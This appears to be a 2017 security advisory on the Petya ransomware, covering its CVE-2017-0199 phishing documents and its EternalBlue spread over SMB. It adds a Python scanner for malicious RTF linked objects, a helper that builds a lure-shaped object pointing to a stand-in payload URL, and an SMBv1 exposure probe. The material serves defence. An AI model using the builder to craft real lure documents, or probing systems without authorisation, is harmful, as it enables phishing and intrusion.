Petya Ransomware Attack

  • Source: SANGFOR Security Center
  • Date Published: 2017-06-30

Summary

DESCRIPTION

On the evening of June 27, 2017, a ransomware strain known as Petya spread across the world. According to the news outlet HackerNews, in Ukraine the state-owned bank Oschadbank and many private banks, the electric power company KyivEnergo, and the national postal service UkrPoshta were all hit by Petya.

At present, Petya has spread across Ukraine, Russia, India, Spain, France, the UK and many other European countries.

VULNERABILITY ANALYSIS

According to research by the SANGFOR FurtherEye security team, Petya is delivered mainly through phishing emails and then spreads inside networks like a worm. Two vulnerabilities are involved: the Windows RTF vulnerability CVE-2017-0199 and the MS17-010 SMB vulnerability.

1. CVE-2017-0199 RTF Vulnerability

Attackers exploit CVE-2017-0199 to take over a computer once a user is lured into opening a specially crafted Microsoft Office document.

Put simply, malicious code is embedded in the Office document as a linked object and is processed as soon as the user opens the document; no further interaction is needed.

In most cases, when a user opens such a document (an RTF file, or another Office format such as PPT), the embedded object causes an HTA file to be downloaded from an attacker-controlled website and executed, after which the attacker controls the computer.

In this campaign, attackers exploited CVE-2017-0199 in documents sent as phishing emails to deliver the Petya ransomware.
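The linked object described above leaves a recognisable footprint in the RTF: an embedded object with the OLE2Link class name, the \objupdate control word that forces the link to refresh on open, and a serialized URL moniker (CLSID {79EAC9E0-BAF9-11CE-8C82-00AA004BA90B}) carrying the address of the remote HTA. The scanner below, an added example that is not part of the Sangfor advisory, pulls the hex of each \objdata block out of an RTF and looks for exactly that footprint. The RTF sample and the URL http://example.com/payload.hta are constructed here for the demonstration and are not taken from a real Petya lure; the helper build_constructed_objdata is likewise ours, included so the scanner can be run offline.

```python
import re
import struct

# Little-endian on-disk layout of the URL Moniker CLSID {79EAC9E0-BAF9-11CE-8C82-00AA004BA90B}.
# A serialized URL moniker inside an embedded object means the object points at a remote resource.
URL_MONIKER_CLSID = bytes.fromhex("E0C9EA79F9BACE118C8200AA004BA90B")

# Hex payload of an RTF embedded object: {\*\objdata 0105...}
OBJDATA_RE = re.compile(rb"\\objdata\s*([0-9A-Fa-f\s]+)")


def extract_url_moniker(data: bytes):
    """Return the URL carried by a serialized URL moniker found in `data`, or None."""
    idx = data.find(URL_MONIKER_CLSID)
    if idx < 0 or idx + 20 > len(data):
        return None
    # MS-OLEDS URLMoniker: CLSID (16) | Length (4, LE) | URL (UTF-16LE, NUL-terminated) | optional extras
    length = struct.unpack_from("<I", data, idx + 16)[0]
    raw = data[idx + 20: idx + 20 + length]
    return raw.decode("utf-16-le", errors="replace").split("\x00")[0]


def scan_rtf(rtf: bytes) -> list:
    """Scan an RTF document for CVE-2017-0199-style linked objects; one finding per \\objdata block."""
    auto_update = b"\\objupdate" in rtf          # link is refreshed (and fetched) when the document opens
    findings = []
    for m in OBJDATA_RE.finditer(rtf):
        hexdata = re.sub(rb"\s+", b"", m.group(1))
        if len(hexdata) % 2:
            hexdata = hexdata[:-1]                # tolerate a truncated final nibble
        data = bytes.fromhex(hexdata.decode("ascii"))
        url = extract_url_moniker(data)
        ole2link = b"OLE2Link" in data            # OLE1 class name used by the in-the-wild exploit documents
        findings.append({
            "ole2link": ole2link,
            "auto_update": auto_update,
            "url": url,
            "suspicious": url is not None and (ole2link or auto_update),
        })
    return findings


def build_constructed_objdata(url: str) -> str:
    """Hex objdata blob shaped like a CVE-2017-0199 linked object (constructed test input, not a real sample)."""
    class_name = b"OLE2Link\x00"
    url_utf16 = url.encode("utf-16-le") + b"\x00\x00"
    ole1_header = (
        struct.pack("<I", 0x00000501)                       # OLEVersion
        + struct.pack("<I", 2)                              # FormatID: embedded object
        + struct.pack("<I", len(class_name)) + class_name   # ClassName
        + struct.pack("<I", 0) + struct.pack("<I", 0)       # TopicName / ItemName lengths
    )
    moniker = URL_MONIKER_CLSID + struct.pack("<I", len(url_utf16)) + url_utf16
    native = b"\x00" * 32 + moniker                         # stand-in for the compound-file bytes around the \x01Ole stream
    return (ole1_header + struct.pack("<I", len(native)) + native).hex()


# Constructed inputs: a lure-shaped RTF and a benign one.
SAMPLE_RTF = (
    r"{\rtf1\ansi{\object\objautlink\objupdate\rsltpict{\*\objdata "
    + build_constructed_objdata("http://example.com/payload.hta")
    + "}}}"
).encode("ascii")
BENIGN_RTF = rb"{\rtf1\ansi Quarterly report, nothing embedded.}"

if __name__ == "__main__":
    for name, doc in (("constructed sample", SAMPLE_RTF), ("benign", BENIGN_RTF)):
        print(name, scan_rtf(doc))
```

The scan works on raw bytes rather than a full OLE compound-file parser, so it also catches samples where the moniker sits inside an embedded compound file, as long as the CLSID and the URL are contiguous (true for any URL shorter than a sector). Treat a hit as a reason to detonate the document in a sandbox, not as proof of exploitation on its own.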

2. MS17-010 SMB EternalBlue Vulnerability

EternalBlue, one of the Equation Group exploits leaked by the Shadow Brokers in April this year, targets the SMB vulnerability fixed by Microsoft in MS17-010 and is the most significant exploit in that leak.

EternalBlue exploits a remote code execution flaw in the Windows SMBv1 server (CVE-2017-0144) against any Windows system that exposes TCP port 445, and the code it runs executes with SYSTEM privileges.

On Windows systems, TCP port 445 carries SMB, the protocol used for file and printer sharing on the local network. Anyone who can connect to TCP 445 can reach the shares a host exposes, and an unpatched SMBv1 service on that port is what EternalBlue attacks.

Once a host has been compromised through the CVE-2017-0199 document, the malware uses it as a foothold and exploits MS17-010 over TCP 445 to infect other reachable machines on the network, including servers that offer shares.
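The precondition for the lateral spread just described is a host that still answers SMBv1 on TCP 445. The probe below, an added example rather than Sangfor's tooling, sends a single SMB_COM_NEGOTIATE request that offers only the SMB1 dialect NT LM 0.12 and classifies the reply: an SMB1 negotiate response that accepts the dialect means SMBv1 is enabled, an SMB2-framed reply or a reset means it is not. The sample responses used for the offline run are constructed here, not captures. Note that this tells you whether a host is exposed to the protocol EternalBlue needs; it does not tell you whether MS17-010 is installed, so use it to find the hosts to patch or to disable SMBv1 on, and only against systems you are authorised to test.

```python
import socket
import struct

SMB1_MAGIC = b"\xffSMB"
SMB2_MAGIC = b"\xfeSMB"
SMB_COM_NEGOTIATE = 0x72


def build_smb1_negotiate(dialects=(b"NT LM 0.12",)) -> bytes:
    """Build an SMB_COM_NEGOTIATE request offering only SMB1 dialects, wrapped in a NetBIOS session message."""
    header = (
        SMB1_MAGIC
        + bytes([SMB_COM_NEGOTIATE])
        + b"\x00\x00\x00\x00"   # NT status
        + b"\x18"               # Flags: canonical pathnames, case-insensitive
        + b"\x53\xc8"           # Flags2 0xc853: Unicode, NT status codes, extended security, long names
        + b"\x00\x00"           # PIDHigh
        + b"\x00" * 8           # SecuritySignature
        + b"\x00\x00"           # Reserved
        + b"\x00\x00"           # TID
        + b"\xff\xfe"           # PID (any value will do)
        + b"\x00\x00"           # UID
        + b"\x00\x00"           # MID
    )
    assert len(header) == 32
    dialect_block = b"".join(b"\x02" + d + b"\x00" for d in dialects)   # each dialect: 0x02 + ASCIIZ name
    smb = header + b"\x00" + struct.pack("<H", len(dialect_block)) + dialect_block  # WordCount=0, ByteCount
    return b"\x00" + len(smb).to_bytes(3, "big") + smb


def classify_negotiate_response(resp: bytes) -> str:
    """Interpret the bytes a server sent back after an SMB1-only negotiate request."""
    pkt = resp[4:]                              # drop the 4-byte NetBIOS session header
    if len(pkt) < 33:
        return "no-smb"                         # reset, empty or truncated: port is not speaking SMB
    if pkt.startswith(SMB2_MAGIC):
        return "smb2-only"                      # server answered in SMB2 framing, SMB1 is not offered
    if not pkt.startswith(SMB1_MAGIC) or pkt[4] != SMB_COM_NEGOTIATE:
        return "no-smb"
    word_count = pkt[32]
    if word_count == 0 or len(pkt) < 35:
        return "smb1-rejected"                  # error response with no parameter words
    dialect_index = struct.unpack_from("<H", pkt, 33)[0]
    return "smb1-rejected" if dialect_index == 0xFFFF else "smb1-enabled"


def probe_smb1(host: str, port: int = 445, timeout: float = 3.0) -> str:
    """Connect, send the negotiate request and classify the reply; returns 'no-response' on connection failure."""
    try:
        with socket.create_connection((host, port), timeout=timeout) as s:
            s.sendall(build_smb1_negotiate())
            return classify_negotiate_response(s.recv(1024))
    except OSError:
        return "no-response"


def constructed_negotiate_response(dialect_index: int) -> bytes:
    """A minimal SMB1 negotiate response, constructed for offline testing (not a network capture)."""
    header = SMB1_MAGIC + bytes([SMB_COM_NEGOTIATE]) + b"\x00" * 4 + b"\x98" + b"\x53\xc8" + b"\x00" * 20
    words = struct.pack("<H", dialect_index) + b"\x00" * 32   # DialectIndex plus padding for the other 16 words
    smb = header + bytes([17]) + words + b"\x00\x00"          # WordCount=17, ByteCount=0
    return b"\x00" + len(smb).to_bytes(3, "big") + smb


if __name__ == "__main__":
    import sys
    if len(sys.argv) > 1:
        print(sys.argv[1], probe_smb1(sys.argv[1]))
    else:
        for di in (0, 0xFFFF):
            print("constructed response, DialectIndex", di, "->",
                  classify_negotiate_response(constructed_negotiate_response(di)))
```

Run it with a host name to probe a real machine, or with no arguments to see the classifier applied to the two constructed replies. A result of "smb1-enabled" on a host that is not a known legacy dependency is the finding to act on.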

IMPACTS

Petya is ransomware that blocks access to a computer or server: once a machine is infected, it encrypts important documents and files and demands a ransom.

Unlike traditional ransomware, which only encrypts individual files, Petya also works at the disk level, overwriting the boot record and encrypting the file system's master file table so that the machine can no longer boot. According to current research it targets 65 file types, covering the common document formats. Once a computer is infected, the user is told to pay 300 US dollars in Bitcoin to have the files decrypted.

SOLUTION

1. To protect computers from infection, download PetyaTool.

2. This ransomware has not spread widely in China because many computers and servers were patched after the WannaCry outbreak last month. Install the patches on any system that is still missing them:

Patch for the CVE-2017-0199 RTF vulnerability:

https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-0199

Patch for the MS17-010 SMB EternalBlue vulnerability:

https://technet.microsoft.com/en-us/library/security/ms17-010.aspx

3. Be cautious of phishing emails. Do not open attachments or links from unknown senders.

4. Sangfor has released security protection rules that defend against the two vulnerabilities mentioned above. No upgrade is required.